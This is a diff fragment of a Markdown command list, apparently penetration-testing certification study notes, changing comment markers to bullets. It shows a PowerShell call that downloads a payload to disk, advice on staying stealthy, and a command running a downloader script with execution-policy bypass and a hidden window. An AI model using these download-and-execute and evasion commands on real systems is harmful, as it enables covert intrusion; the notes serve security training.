ForeCyberSec/eCPPT-Notes/Command-list.md

 PS C:\> $downloader.DownloadFile($payload,$local_file)

-//If trying to remain stealthy, also make sure to use the execution policy bypass and window hidden options
+- If trying to remain stealthy, also make sure to use the execution policy bypass and window hidden options

 C:\> powershell.exe -ExecutionPolicy Bypass -Window Hidden .\downloader.ps1

-//there is a powershell port-scanner script if needed in the offensive powershell folder
+- there is a powershell port-scanner script if needed in the offensive powershell folder